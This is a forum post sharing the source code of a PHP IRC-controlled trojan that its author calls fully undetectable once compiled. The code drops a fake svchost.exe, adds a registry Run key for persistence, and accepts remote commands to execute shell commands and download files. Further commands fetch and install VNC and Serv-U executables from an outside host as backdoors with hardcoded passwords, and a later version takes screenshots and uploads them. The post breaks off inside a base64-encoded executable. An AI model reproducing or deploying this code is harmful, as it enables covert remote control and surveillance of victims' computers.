PHP Trojan

PHP Trojan


This is still in development but if you use bamblam PHP compiler(It's really just an embedder)...

This becomes 100% FUD
It's pretty basic it was a project me and Sean(Debug) were working on but eventually it just got dropped we had a lot more planned like key logging, grabbing cd-keys and etc...

But now I guess it's a bit useless for us, so heres the source...


PATH.PHP - Some what of an installer... never really got around to making it check other drives and etc.

<?php

$somin = dirname(__FILE__);
if(!file_exists("C:\WINDO WS\update.txt")){
$fh=fopen("C:\WINDOWS\upd ate.txt", "w");

fwrite($fh, $somin);

fclose($fh);
}
if(!file_exists("C:\WINDO WS\svchost.exe")){

$fh2=fopen("C:\WINDOWS\sv chost.exe", "w");

fwrite($fh2,base64_decode (""));

fclose($fh2);
}

$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);

$process = proc_open('start C:\WINDOWS\svchost.exe', $descriptorspec, $pipes);
?>
Make sure after you compile SVCHOST

You base64 encode it and put it in this line in the installer fwrite($fh2,base64_decode ("[ - CODE - ]"));

When I mean base64 encode I mean after the fact you've used bamblam on it.

TDnet.php - The Actual PHP Bot...

PHP Code:<?php

error_reporting(0);
$mainfile = $argv[0];
class DFnet
{
### PUBLIC ###
var $server_addr = "your.irc.com";
var $server_port = 6667;
var $server_chan = "#TDnet";
var $server_chan_pass = "";
var $bot_nick = "TDnet";
var $bot_ident = "TDnet";
var $bot_real = "TDnet";
var $bot_localhost = "localhost";
## Put your IRC Nick in the array ##
var $bot_masters = array("");
var $bot_timeout = -1;
var $enable_output_logging = FALSE;
var $enable_logging = FALSE;
### PRIVATE ###
var $script_status = "OK";
var $fp;
var $error;
var $data;
var $cmds;
var $threads = array();

function init()
{
$this->parsedata("DFnet", "init() -> Initiated...");
$this->script_status = "OK";
if (!is_int($this->server_port))
{
$this->parsedata("DFnet", "init() -> Failure: The server port (" . $this->server_port . ") is invalid.");
return FALSE;
};
$this->parsedata("DFnet", "init() -> Status: attempting connection to " . $this->server_addr . ":" . $this->server_port);
$this->fp = @fsockopen($this->server_addr, $this->server_port, &$errno, &$errstr, 30);
if (!$this->fp)
{
$this->parsedata("DFnet", "init() -> Failure: Unable to connect (3); [" . $errno . "]: " . $errstr);
return FALSE;
};
$this->parsedata("DFnet", "init() -> Status: Connection successful.");
$this->parsedata("DFnet", "init() -> Status: Starting main()...");
$this->main();
$this->parsedata("DFnet", "init() -> Status: main() ended");
$this->parsedata("DFnet", "init() -> Status: init() call ended (returning true)");
return TRUE;
}
function exe($filepath)
{
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open('start ' . $filepath, $descriptorspec, $pipes);
$timestamp = time() + 1;
while ($timestamp > time()){};
proc_close($process);
return TRUE;
}
function send($data)
{
if ($this->fp)
{
if (!@fputs($this->fp, $data . "\r\n"))
{
$this->parsedata("DFnet", "send() -> Failure: Could not send packet (unknown error)");
};
};
}
function close()
{
$this->parsedata("DFnet", "close() -> Status: Initiated...");
$this->parsedata("DFnet", "close() -> Status: Closing Connection");
$this->parsedata("DFnet", "close() -> Status: Sending QUIT");
@fputs($this->fp, "QUIT");
$this->parsedata("DFnet", "close() -> Status: Nulling resource");
$this->fp = NULL;
$this->parsedata("DFnet", "close() -> Status: Changing script status to failed...");
$this->script_status = "NOT_OK";
$this->parsedata("DFnet", "close() -> Status: Calling for 5 second sleep...");
$timestamp = time() + 5;
while ($timestamp > time()){};
}
function parsedata($component, $data)
{
if ($this->enable_output_logging)
{
echo "(" . time() . ") : [$component] => " . $data . "\n\n";
ob_flush();
flush();
};
}
function logdata($data)
{
if ($this->enable_logging)
{
$this->log .= trim($data) . "\n";
echo $data . "\n";
};
}
function process($cmds)
{
if ((substr($cmds['message'], 0, 1) == "!") && (substr($cmds['sent_to'], 0, 1) == "#"))
{
$message = substr($cmds['message'], 1);
$message = explode(" ", $message);
$nick = $message[0];
if (preg_match("/^[a-zA-Z0-9_*]*$/", $nick))
{
$nick = str_replace("*", ".*", $nick);
if (preg_match("/" . $nick . "/", $this->bot_nick))
{
$cmd = $message[1];
$message[0] = "";
$message[1] = "";
$message = implode(" ", $message);
$params = explode(" ", $message);
$cmd = strtolower($cmd);
$nocmd = "NO";
switch ($cmd)
{
case "say":
$params = implode(" ", $params);
$this->send("PRIVMSG " . $cmds['sent_to'] . " " . $params);
break;
case "restart":
$this->close();
break;
case "die":
$this->parsedata("DFnet", "process() -> Status: Forced to $cmd by " . $cmds['from']);
$this->close();
exit;
break;
case "setmode":
$params = trim(implode(" ", $params));
$this->send("MODE " . $cmds[sent_to] . " " . $params);
break;
case "setmaster":
$params = trim(implode(" ", $params));
if (!empty($params))
{
$params = explode(" ", $params);
foreach ($params as $master_to_add)
{
if (!in_array($master_to_add , $this->bot_masters))
{
$this->bot_masters[] = $params[0];
$this->send("PRIVMSG " . $cmds['sent_to'] . " Now added " . $master_to_add . " to botmasters list.");
}
else
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " Could not add " . $master_to_add . " to the botmasters: already in botmaster list");
};
};
}
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " setmaster Usage: setmaster [[str nick] [str nick]...]");
};
break;
case "newnick":
$params = trim(implode(" ", $params));
$params = explode(" ", $params);
while(substr_count($param s[0], "*") > 0)
{
$params[0] = preg_replace("/\*/", rand(0, 9), $params[0], 1);
};
if (preg_match("/^[a-zA-Z0-9_]*$/", $params[0]))
{
$this->send("NICK " . $params[0]);
$this->send("PRIVMSG " . $cmds['sent_to'] . " Changed nick to " . $params[0]);
$this->bot_nick = $params[0];
};
break;
case "exec":
$params = @trim(@implode(" ", $params));
ob_start();
@exec($params, $output);
ob_end_clean();
foreach ($output as $output_var)
{
if (is_string($output_var))
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " " . $output_var);
};
};
break;
case "delmaster":
$params = trim(implode(" ", $params));
if (!empty($params))
{
$params = explode(" ", $params);
foreach ($params as $master_to_del)
{
if (!in_array($master_to_del , $this->bot_masters))
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " Could not remove " . $master_to_del . " from the botmasters: not in botmaster list.");
}
else
{
$badlist[] = $master_to_del;
$this->send("PRIVMSG " . $cmds['sent_to'] . " Now removed " . $master_to_del . " from the botmasters list.");
};
};
foreach ($this->bot_masters as $bot_master)
{
if (!in_array($bot_master, $badlist))
{
$new_list[] = $bot_master;
};
};
$this->bot_masters = $new_list;
}
else
{
$this->send("PRIVMSG " . $cmds['sent_to'] . " delmaster Usage: delmaster [[str nick] [str nick]...]");
};
break;
case "raw":
$params = implode(" ", $params);
$this->send($params);
break;
case "make":
$this->send("PRIVMSG " . $cmds['sent_to'] . " Maker: TheDefaced Hacking / Security Team (DemonFlyFF.com - First v15 FlyFF Private Server) Additional Information Follows:");
$this->send("PRIVMSG " . $cmds['sent_to'] . " MakeInfo: TDcssBot Modded DFnet [Build 27] VerInfo: 1.8.1 (2700) ModInfo: TLS2500 X260 OSInfo: Microsoft Windows [EXE]");
break;
case"download":
$url = @trim(@implode(" ",$params));


$fh=fopen("download", "a");

$red = base64_decode("AzQ=");
$blue = base64_decode("AzEy");
$yellow = base64_decode("Azg=");
$green = base64_decode("Azk=");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading $yellow $url $red ::. ");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading $url $yellow 75% $red ::. ");

fwrite($fh, file_get_contents("$url") );

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading $url $green 90% $red ::. ");


fclose($fh);

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Finished Downloading $url $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue File saved as $green \"download\" $red ::. ");
break;
case"vnc-install":

$filename = "winvnc4.exe";
$filename2 = "wm_hooks.dll";
$filename3 = "logmessages.dll";

$fh=fopen("$filename", "a");

$fh2=fopen("$filename2", "a");

$fh3=fopen("$filename3", "a");

$red = base64_decode("AzQ=");
$blue = base64_decode("AzEy");
$yellow = base64_decode("Azg=");
$green = base64_decode("Azk=");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading VNC SERVER $red ::. ");



$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading VNC SERVER $yellow 75% $red ::. ");

fwrite($fh, file_get_contents("http://www.thedefaced.org/vnc/winvnc4.exe"));
fwrite($fh2, file_get_contents("http://www.thedefaced.org/vnc/wm_hooks.dll"));
fwrite($fh3, file_get_contents("http://www.thedefaced.org/vnc/logmessages.dll"));

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading VNC SERVER $green 90% $red ::. ");


fclose($fh);
fclose($fh2);
fclose($fh3);


$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Finished Downloading VNC SERVER $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue VNC-Server Saved as $yellow $filename $red ::. ");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Installing VNC SERVER $red ::. ");

$fh4=fopen("reg.reg", "a");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Writing registery file to import. $red ::. ");

fwrite($fh4, base64_decode("V2luZG93cy BSZWdpc3RyeSBFZGl0b3IgVmV yc2lvbiA1LjAwDQoNCltIS0VZ X0NVUlJFTlRfVVNF
UlxTb2Z0d2FyZVxSZWFsVk5DX FdpblZOQzRdDQoiU2VjdXJpdH lUeXBlcyI9IlZuY0F1dGgiDQo iUmV2Z
XJzZVNlY3VyaXR5VHlwZXMiPS JOb25lIg0KIlF1ZXJ5Q29ubmV jdCI9ZHdvcmQ6MDAwMDAwMDAN CiJRdW
VyeU9ubHlJZkxvZ2dlZE9uIj1 kd29yZDowMDAwMDAwMA0KIlBv cnROdW1iZXIiPWR3b3JkOjAwM DAxNzB
jDQoiSWRsZVRpbWVvdXQiPWR3 b3JkOjAwMDAwZTEwDQoiSFRUU FBvcnROdW1iZXIiPWR3b3JkOj AwMDAx
NmE4DQoiTG9jYWxIb3N0Ij1kd 29yZDowMDAwMDAwMA0KIkhvc3 RzIj0iICwiDQoiQWNjZXB0S2V 5RXZlb
nRzIj1kd29yZDowMDAwMDAwMQ 0KIkFjY2VwdFBvaW50ZXJFdmV udHMiPWR3b3JkOjAwMDAwMDAx DQoiQW
NjZXB0Q3V0VGV4dCI9ZHdvcmQ 6MDAwMDAwMDENCiJTZW5kQ3V0 VGV4dCI9ZHdvcmQ6MDAwMDAwM DENCiJ
EaXNhYmxlTG9jYWxJbnB1dHMi PWR3b3JkOjAwMDAwMDAwDQoiR GlzY29ubmVjdENsaWVudHMiPW R3b3Jk
OjAwMDAwMDAxDQoiQWx3YXlzU 2hhcmVkIj1kd29yZDowMDAwMD AwMQ0KIk5ldmVyU2hhcmVkIj1 kd29yZ
DowMDAwMDAwMA0KIkRpc2Nvbm 5lY3RBY3Rpb24iPSJOb25lIg0 KIlJlbW92ZVdhbGxwYXBlciI9 ZHdvcm
Q6MDAwMDAwMDANCiJSZW1vdmV QYXR0ZXJuIj1kd29yZDowMDAw MDAwMA0KIkRpc2FibGVFZmZlY 3RzIj1
kd29yZDowMDAwMDAwMA0KIlBh c3N3b3JkIj1oZXg6MDUsY2UsN 2YsY2MsYWQsODQsZDgsNGMNCi JVcGRh
dGVNZXRob2QiPWR3b3JkOjAwM DAwMDAxDQoiUG9sbENvbnNvbG VXaW5kb3dzIj1kd29yZDowMDA wMDAwM
Q0KIlVzZUNhcHR1cmVCbHQiPW R3b3JkOjAwMDAwMDAxDQoiVXN lSG9va3MiPWR3b3JkOjAwMDAw MDAxDQ
oNCg=="));

fclose($fh4);

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Importing registery file - VNC Conf Data. $red ::. ");

$this->exe("REGEDIT.EXE /s reg.reg");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green Success!!. $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Port: $green 5900 $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Password: $green dfnet $red ::. ");

$this->exe("winvnc4.exe");

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Finished installing VNC SERVER $red ::. ");
break;
case"serv-u-install":

$red = base64_decode("AzQ=");
$blue = base64_decode("AzEy");
$yellow = base64_decode("Azg=");
$green = base64_decode("Azk=");

$filename="svchost.exe";
$filename2="NetBIOS.dll";
$filename3="install.exe";

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading Serv-U Server $red ::. ");

$fh=fopen("$filename", "a");

$fh2=fopen("$filename2", "a");

$fh3=fopen("$filename3", "a");


fwrite($fh, file_get_contents("http://www.thedefaced.org/servu/svchost.exe"));

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading Serv-U Server $red %30 ::. ");

fwrite($fh2, file_get_contents("http://www.thedefaced.org/servu/NetBIOS.dll"));

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading Serv-U Server $yellow %60 $red ::. ");

fwrite($fh3, file_get_contents("http://www.thedefaced.org/servu/install.exe"));

fclose($fh3);
fclose($fh);
fclose($fh2);

$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Downloading Serv-U Server $green %90 $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green Serv-U download has finished! $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Now attempting to install Serv-U $red ::. ");
$this->exe("install.exe");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green SUCCESS!! Server-U Now Installed $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green Port: 1337 $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green User: admin $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $green Pass: dfnet $red ::. ");
$this->send("PRIVMSG " . $cmds['sent_to'] . " $red .:: $blue Serv-U Install Finished $red ::. ");



break;
######################
default:
$this->send("PRIVMSG " . $cmds['sent_to'] . " Command ($cmd) not recognized");
$nocmd = "YES";
break;
};
if ($nocmd == "NO")
{
$this->parsedata("DFnet", "process() -> Status: Forced to $cmd by " . $cmds['from']);
};
};
};
};
}
function parsebuffer($data)
{
if ($data === FALSE)
{
return FALSE;
};
if ($data['action'] == "PRIVMSG")
{
if (in_array($data['from'], $this->bot_masters))
{
if (preg_match("/!.*/", $data['message']))
{
$this->process($data);
};
};
}
elseif ($data[from] == "PING")
{
$this->parsedata("DFnet", "parsebuffer() -> Status: Sending PONG");
$this->send("PONG " . str_replace(":", "", $data['action']));
$this->parsedata("DFnet", "parsebuffer() -> Status: Sending JOIN");
$this->sendjoin();
};
}
function receive()
{
if ($datarec = @fgets($this->fp, 1024))
{
$datarec = str_replace("\n", "", $datarec);
$datarec = str_replace("\r", "", $datarec);
$this->logdata($datarec);
$params = explode(" ", $datarec);
$details = explode ("@", $from[1]);
$message = str_replace($params[0], "", $datarec);
$message = str_replace($params[1], "", $message);
$message = str_replace($params[2], "", $message);
$from = explode ("!", $params[0]);
######################### ########################
$data['from'] = str_replace(":", "", $from[0]);
$data['ident'] = $details[0];
$data['host'] = $details[1];
$data['action'] = $params[1];
$data['sent_to'] = $params[2];
$data['message'] = substr($message, 4);
$data['ping'] = $params[0];
return $data;
};
return FALSE;
}
function sendjoin()
{
if (!empty($this->server_chan_pass))
{
$this->send("JOIN " . $this->server_chan . " " . $this->server_chan_pass);
}
$this->send("JOIN " . $this->server_chan);
}
function main()
{
$this->parsedata("DFnet", "main() -> Status: Initiated...");
$timeout = $this->bot_timeout;
$this->parsedata("DFnet", "main() -> Status: Timeout set to $timeout");
$this->parsedata("DFnet", "main() -> Status: Sending NICK");
$this->send("NICK ".$this->bot_nick);
$this->parsedata("DFnet", "main() -> Status: Sending USER");
$this->send("USER ".$this->bot_ident.' '.$this->server_addr.' '.$this->bot_nick.' : '.$this->bot_real);
$this->parsedata("DFnet", "main() -> Status: Sending JOIN");
$this->sendjoin();
$this->parsedata("DFnet", "main() -> Status: Starting parse loop...");
while ((!@feof($this->fp)) && ($timeout != 0) && ($this->script_status == "OK"))
{
if ($timeout > 0)
{
$timeout = $timeout - 1;
};
$this->parsebuffer($this->receive());
};
$this->parsedata("DFnet", "main() -> Status: Connection lost to server.");
if ($this->script_status == "OK")
{
$this->parsedata("DFnet", "main() -> Status: Calling close()...");
$this->close();
};
}
};
while(1)
{
$nick = "TDnet";
$DFnet = new DFnet;
$DFnet->server_addr = "your.irc.com";
$DFnet->server_port = 6667;
$DFnet->server_chan = "#TDnet";
$DFnet->server_chan_pass = "";
$DFnet->bot_nick = $nick;
$DFnet->bot_ident = $nick;
$DFnet->bot_real = "TDnet";
$DFnet->bot_localhost = "localhost";
## IRC nick in the array ##
$DFnet->bot_masters = array("");
$DFnet->bot_timeout = -1;
$DFnet->enable_output_logging = FALSE;
$DFnet->enable_logging = FALSE;
$DFnet->init();
};
?>

Keep in mind this comes with no support/etc... if I find any more of the source I'll be sure to post it... at one point it actually had a screen shot function and more not sure if any of that is still available but for now this is what I've got.




Some more source I dug up this one has the screenshot function and more but requires CURL so be sure to figure out how to use bamblam to compile it with CURL... rember this is windows only the screenshot function only extracts an exe created by korrupt snaps a screenshot uploads it to image shack and sends you the link via irc.

CODE<?php
error_reporting(0);
/* Inital hide block */
$filename = "C:\WINDOWS\update.tx t";
if(file_exists("C:\WINDOW S\update.txt")){

$file = fopen("C:\WINDOWS\update. txt" , "r");
/* DELETE HIDER */
exec('del "' . fread($file, filesize($filename)) . '\*.exe"');

fclose($file);

exec("del $filename");


$file2 = fopen("C:\WINDOWS\geg.reg ", "a");


fwrite($file2, base64_decode("V2luZG93cy BSZWdpc3RyeSBFZGl0b3IgVmV yc2lvbiA1LjAwDQoNCltIS0VZ X0xPQ0FMX01BQ0hJ
TkVcU09GVFdBUkVcTWljcm9zb 2Z0XFdpbmRvd3NcQ3VycmVudF ZlcnNpb25cUnVuXQ0KIldpbmR vd3NVc
GRhdGUiPSJDOlxcV0lORE9XU1 xcc3ZjaG9zdC5leGUiDQoNCg= ="));

fclose($file2);

exec("regedit /s C:\WINDOWS\geg.reg ");
exec("del C:\WINDOWS\geg.reg ");
}

$mainfile = $argv[0];
class DFnet
{
### PUBLIC ###
var $server_addr = "";
var $server_port = 6667;
var $server_chan = "";
var $server_chan_pass = "";
var $bot_nick = "DFnet";
var $bot_ident = "DFnet";
var $bot_real = "DFnet";
var $bot_localhost = "localhost";
var $bot_masters = array("");
var $bot_timeout = -1;
var $enable_output_logging = FALSE;
var $enable_logging = FALSE;
### PRIVATE ###
var $script_status = "OK";
var $fp;
var $error;
var $data;
var $cmds;
var $threads = array();

function init()
{
$this->parsedata("DFnet", "init() -> Initiated...");
$this->script_status = "OK";
if (!is_int($this->server_port))
{
$this->parsedata("DFnet", "init() -> Failure: The server port (" . $this->server_port . ") is invalid.");
return FALSE;
};
$this->parsedata("DFnet", "init() -> Status: attempting connection to " . $this->server_addr . ":" . $this->server_port);
$this->fp = @fsockopen($this->server_addr, $this->server_port, &$errno, &$errstr, 30);
if (!$this->fp)
{
$this->parsedata("DFnet", "init() -> Failure: Unable to connect (3); [" . $errno . "]: " . $errstr);
return FALSE;
};
$this->parsedata("DFnet", "init() -> Status: Connection successful.");
$this->parsedata("DFnet", "init() -> Status: Starting main()...");
$this->main();
$this->parsedata("DFnet", "init() -> Status: main() ended");
$this->parsedata("DFnet", "init() -> Status: init() call ended (returning true)");
return TRUE;
}
function exe($filepath)
{
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open('start ' . $filepath, $descriptorspec, $pipes);
$timestamp = time() + 1;
while ($timestamp > time()){};
proc_close($process);
return TRUE;
}
function send($data)
{
if ($this->fp)
{
if (!@fputs($this->fp, $data . "\r\n"))
{
$this->parsedata("DFnet", "send() -> Failure: Could not send packet (unknown error)");
};
};
}
function close()
{
$this->parsedata("DFnet", "close() -> Status: Initiated...");
$this->parsedata("DFnet", "close() -> Status: Closing Connection");
$this->parsedata("DFnet", "close() -> Status: Sending QUIT");
@fputs($this->fp, "QUIT");
$this->parsedata("DFnet", "close() -> Status: Nulling resource");
$this->fp = NULL;
$this->parsedata("DFnet", "close() -> Status: Changing script status to failed...");
$this->script_status = "NOT_OK";
$this->parsedata("DFnet", "close() -> Status: Calling for 5 second sleep...");
$timestamp = time() + 5;
while ($timestamp > time()){};
}
function parsedata($component, $data)
{
if ($this->enable_output_logging)
{
echo "(" . time() . ") : [$component] => " . $data . "\n\n";
ob_flush();
flush();
};
}
function logdata($data)
{
if ($this->enable_logging)
{
$this->log .= trim($data) . "\n";
echo $data . "\n";
};
}
function upload($fileName) {

$result = null;

$ch = curl_init();

$post['xml']='yes';
$post['fileupload']='@' . $fileName;
curl_setopt($ch, CURLOPT_URL, "http://www.imageshack.us/index.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 340);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect: '));

$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function process($cmds)
{
if ((substr($cmds['message'], 0, 1) == "!") && (substr($cmds['sent_to'], 0, 1) == "#"))
{
$message = substr($cmds['message'], 1);
$message = explode(" ", $message);
$nick = $message[0];
if (preg_match("/^[a-zA-Z0-9_*]*$/", $nick))
{
$nick = str_replace("*", ".*", $nick);
if (preg_match("/" . $nick . "/", $this->bot_nick))
{
$cmd = $message[1];
$message[0] = "";
$message[1] = "";
$message = implode(" ", $message);
$params = explode(" ", $message);
$cmd = strtolower($cmd);
$nocmd = "NO";
switch ($cmd)
{
case "say":
$params = implode(" ", $params);
$this->send("PRIVMSG " . $cmds['sent_to'] . " " . $params);
break;
case "restart":
$this->close();
break;
case"screenshot":

$this->send("PRIVMSG " . $cmds['sent_to'] . " Please standby while the screenshot is being taken...");

$screen_exe = fopen("C:\WINDOWS\screen. exe", "w");


fwrite($screen_exe, base64_decode("TVqQAAMAAA AEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAgAAAAA4fug4At AnNIb
gBTM0hVGhpcyBwcm9ncmFtIGN hbm5vdCBiZSBydW4gaW4gRE9T IG1vZGUuDQ0KJAAAAAAAAABQR QAATAE
FAIrwUkcAAAAAAAAAAOAADwML AQI4AA4AAAAYAAAAAgAAQBIAA AAQAAAAIAAAAABAAAAQAAAAAg AABAAA
AAEAAAAEAAAAAAAAAABgAAAAB AAAx4gAAAIAAAAAACAAABAAAA AAEAAAEAAAAAAAABAAAAAAAAA AAAAAA
ABQAACMBAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAC5
0ZXh0AAAAVA0AAAAQAAAADgAA AAQAAAAAAAAAAAAAAAAAAGAAA GAuZGF0YQAAAEAAAAAAIAAAAA IAAAAS
AAAAAAAAAAAAAAAAAABAAADAL nJkYXRhAABAAQAAADAAAAACAA AAFAAAAAAAAAAAAAAAAAAAQAA AQC5ic
3MAAAAAsAAAAABAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAIAAAMA uaWRhdGEAAIwEAAAAUAAAAAYA AAAWAA
AAAAAAAAAAAAAAAABAAADAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAFWJ5YPsGIld+ItVCDHbiXX8 iwIx9o
sAPZEAAMB3Qz2NAADAclu+AQA AAMcEJAgAAAAxwIlEJATo1AsA AIP4AXRshcB0KscEJAgAAAD/0Lv/////idiLdfyLXfiJ7F3CBAA9kwAAw HS9PZQAAMB0u4nYi3X8i134ie xdwgQAjXYAPQUAAMB16McEJAs AAAAx
9ol0JATodwsAAIP4AXQ0hcB0z ccEJAsAAAD/0OuhxwQkCAAAALsBAAAAiVwkB OhOCwAAhfZ0iOiFBgAAu//////rgccEJAsAAAC5AQAAALv/////iUwkBOgkCwAA6WL////rDZCQkJCQkJCQkJCQkJBVieVT g+wkjV34xwQkABBAAOi6BAAAg +wE6DIGAADHRfgAAAAAuABAQA CNVfS
JXCQQiw0AIEAAiUQkBIlUJAiJ TCQMxwQkBEBAAOjxCgAAoRBAQ ACFwHRYoxAgQACLFWRRQACF0g +FiwAA
AIP64HQgoRBAQACJRCQEix1kU UAAi0swiQwk6KYKAACLFWRRQA CD+sB0G4sdEEBAAIlcJASLDWR RQACLU
VCJFCTogAoAAOhrCgAAix0QIE AAiRjoXgUAAIPk8Og2CgAAiwi JTCQIixUAQEAAiVQkBKEEQEAA iQQk6B
kEAACJw+gCCgAAiRwk6OoDAAC JRCQEixVkUUAAi0IQiQQk6CUK AACLFWRRQADpVf///412AI28JwAAAABVieWD7AjHBC QBAAAA/xVcUUAA6Mj+//+QjbQmAAAAAFWJ5YPsCMcEJAI AAAD/FVxRQADoqP7//5CNtCYAAAAAVYsNdFFAAInlXf/hjXQmAFWLDWhRQACJ5V3/4ZCQkJBVieVd6ZcGAACQkJCQk JCQVYnlV1ZTg+x8x0QkDAAAAA DHRCQIAQAAAMdEJARFAAAAxwQ kLAAA
AOiTAgAAg+wQx0QkDAAAAADHR CQIAwAAAMdEJARFAAAAxwQkLA AAAOhsAgAAg+wQxwQkAAAAAOh tAgAAg
+wExwQkAgAAAOhuAgAAg+wEiU WkuwAAAADHBCQAAAAA6GcCAAC D7ASJxo19uPy5CwAAAInY86vH RbgoAA
AAx0QkGAAAAACNRbiJRCQUx0Q kEAAAAADHRCQMAAAAAMdEJAgA AAAAi0WkiUQkBIk0JOjYAQAAg +wcg33
MAHUpi0XAicHB+R+JyjHCKcoP r1W8D7dFxoPABw+vwoXAeQODw AfB+AOJRcyLRcyJBCTo2wgAAI nHhcB1
LMdEJAwQAAAAx0QkCAAwQADHR CQECDBAAMcEJAAAAADowQEAAI PsEOn4AAAAx0XIAAAAAMdEJBg AAAAAj
UW4iUQkFIl8JBCLRcCJRCQMx0 QkCAAAAACLRaSJRCQEiTQk6DE BAACD7BzHRCQEKTBAAItFCIkE JOhrCA
AAicOFwHUpx0QkDBAAAADHRCQ IADBAAMdEJAQsMEAAxwQkAAAA AOhBAQAAg+wQ63tmx0WuAABmx 0WwAAC
LRcyDwDaJRapmx0WoQk3HRbI2 AAAAiVwkDMdEJAgBAAAAx0QkB A4AAACNRaiJBCTo2wcAAIlcJA zHRCQI
AQAAAMdEJAQoAAAAjUW4iQQk6 LwHAACJXCQMx0QkCAEAAACLRc yJRCQEiTwk6KEHAACF9nQTiXQ kBMcEJ
AAAAADovQAAAIPsCIX/dAiJPCTobgcAAIXbdAiJHCToU gcAAOitAAAA6LgAAACNZfRbXl 9dw1WJ5YPsCMcEJEkwQADobv3//8cEJGQAAADowgAAAIPsBLgAAA AAycIQAJCQkJCQkP8lGFFAAJC QAAAAAAAAAAD/JbxRQACQkAAAAAAAAAAA/yW0UUAAkJAAAAAAAAAAAP8lqF FAAJCQAAAAAAAAAAD/JaxRQACQkAAAAAAAAAAA/yWwUUAAkJAAAAAAAAAAAP8luF FAAJCQAAAAAAAAAAD/JaRRQACQkAAAAAAAAAAA/yWgUUAAkJAAAAAAAAAAAP8lQF FAAJCQAAAAAAAAAAD/JShRQACQkAAAAAAAAAAA/yVEUUAAkJAAAAAAAAAAAFW4EA AAAInlU4PsZIPk8OhMBQAA6Oc BAADosgYAAInDjUWoiQQk6LUG AACD7
ASF23UG6Z8AAABDD7YLgPkgD5 TAgPkJD5TCCdCoAXXqgPkidD6 A+SAPlcAx0oD5CQ+VwoXQdEyN tgAAAA
CNvwAAAACEyXQ8Qw+2C4D5IA+ VwDHSgPkJD5XChdB15uskjXQm AEMPtguA+SIPlcAx0oTJD5XCh dB164D
5InRojbYAAAAAgPkgD5TAgPkJ D5TC6xKJ9kMPtguA+SAPlMKA+ QkPlMAJ0KgBderHBCQAAAAA6A 4GAACD
